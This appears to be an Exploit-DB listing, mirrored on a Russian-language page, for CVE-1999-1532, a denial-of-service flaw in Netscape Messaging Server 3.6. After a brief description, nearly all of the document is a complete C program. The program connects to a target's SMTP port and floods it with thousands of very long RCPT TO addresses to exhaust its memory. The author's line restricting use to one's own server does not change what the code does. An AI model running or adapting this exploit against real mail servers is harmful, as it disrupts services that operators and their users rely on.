- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19571
- Проверка EDB
-
- Пройдено
- Автор
- NOBUO MIWA
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-1999-1532
- Дата публикации
- 1999-10-28
Netscape Messaging Server 3.6/3.54/3.55 - 'RCPT TO' Denial of Service
C:
// source: https://www.securityfocus.com/bid/748/info
Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service.
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define STR_HELO "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
int port=25, sd, rt ;
long li ;
struct hostent *he;
si->sin_addr.s_addr = inet_addr(hostIPaddr);
si->sin_family = AF_INET;
si->sin_port = htons (port);
sd = socket (si->sin_family, SOCK_STREAM, 0);
if (sd == -1) return (-1);
rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
if ( rt < 0 ) {
close(sd);
return(-1);
}
return(sd) ;
}
void sendRCPT2(int sd)
{
char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
int rt, i;
memset( tmpStr, 0, sizeof(tmpStr) ) ;
recv( sd, tmpStr, sizeof(tmpStr), 0 );
printf("%s",tmpStr);
printf("%s",STR_HELO);
send( sd, STR_HELO, strlen(STR_HELO), 0 );
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
if ( rt>0 ) printf("%s",tmpStr);
printf("%s",STR_MAILFROM);
send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
if ( rt>0 ) printf("%s",tmpStr);
strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
strcat( rcptStr, "aaaaaaaaaa") ;
strcat( rcptStr, "\n" );
for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
send( sd, rcptStr, strlen(rcptStr), 0 );
rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
strncpy( strn, tmpStr, 60 ) ;
if ( rt>0 ) printf("%s \n",strn);
}
return;
}
int main (int argc, char *argv[])
{
char hostIPaddr[80], *cc, *pfft;
int sd = 0;
struct sockaddr_in si;
printf("You can use ONLY for YOUR Messaging Server 3.6\n");
if (argc != 2) {
printf("Usage: %s IPaddress \n",argv[0]);
exit(1);
} else
strcpy (hostIPaddr, argv[1]);
sd = openSocket(&si,hostIPaddr);
if (sd < 1) {
printf("failed!\n");
exit(-1);
}
sendRCPT2( sd );
close (sd);
exit(0);
}
- Источник
- www.exploit-db.com